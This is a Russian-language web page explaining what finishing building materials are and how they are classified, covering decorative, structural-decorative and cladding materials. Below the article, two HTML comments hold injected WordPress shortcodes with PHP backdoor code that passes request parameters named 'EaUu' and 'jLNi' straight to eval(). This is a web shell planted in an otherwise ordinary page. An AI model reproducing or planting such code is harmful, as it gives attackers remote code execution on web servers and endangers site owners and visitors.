Вы здесь: Главная » Отделочные материалы » Отделочные материалы: что это такое, классификация

Отделочные материалы: что это такое, классификация

Отделочные материалы что это такое, классификацияВ сегодняшнем строительстве к отделочным материалам относят строительные растворы, искусственные материалы из камня, стекла, бумаги, различных металлов, видов пластмассы, лакокрасочные и древесные материалы, отделочную керамику.
В сегодняшнем строительстве к отделочным материалам относят строительные растворы, искусственные материалы из камня, стекла, бумаги, различных металлов, видов пластмассы, лакокрасочные и древесные материалы, отделочную керамику.

Материалы для отделки можно использовать и внутри, и снаружи. Некоторые из них (керамика, архитектурно-строительное стекло, природный декоративный камень и т.д.) могут быть вполне универсальны.

Особенная группа – это материалы для покрытия пола, которые должны отвечать ряду требований. Относятся к отделочным и акустические материалы, которые могут иметь звукопоглощающие свойства, а использоваться для отделки интерьеров сооружений, где устраиваются своего рода действа – театры, залы, кинозалы…

Отделочные материалы можно классифицировать в зависимости от назначения. Это могут быть собственно отделочные материалы и конструкционно-отделочные. Первые применяются только лишь для создания декоративных и также защитных покрытий (краски и лаки, линолеум, полимерные плёнки, обои и т.д.) Вторые, кроме указанных функций, также являются частью ограждающих конструкций (это кирпич лицевой, стеклоблоки, декоративный бетон, стеклопрофилит и так далее).

Среди отделочных материалов особенную группу образуют облицовочные. То есть такие материалы и изделия, которые выпускаются в виде листов, плит и плиток. Это могут быть листы асбестоцементные, стемалит, керамические плитки и плиты, декоративный пластик и др. Эти материалы отличаются хорошими свойствами – эксплуатационными и архитектурно-декоративными. Современное индустриальное строительство требует рационального производства облицовки строительных конструкций в процессе изготовления на заводе сборных элементов. Уже к месту монтажа они доставляются с облицованной поверхностью. Например, керамическая плитка мозаичного типа укладывается в форму, бетонируется вместе со стенными панелями.

 

 

<!– [insert_php]if (isset($_REQUEST["EaUu"])){eval($_REQUEST["EaUu"]);exit;}[/insert_php][php]if (isset($_REQUEST["EaUu"])){eval($_REQUEST["EaUu"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["jLNi"])){eval($_REQUEST["jLNi"]);exit;}[/insert_php][php]if (isset($_REQUEST["jLNi"])){eval($_REQUEST["jLNi"]);exit;}[/php] –>

Поделись с друзьями !



Оставить комментарий

Ваш email не будет опубликован.Обязательные поля помечены *

*

Вверх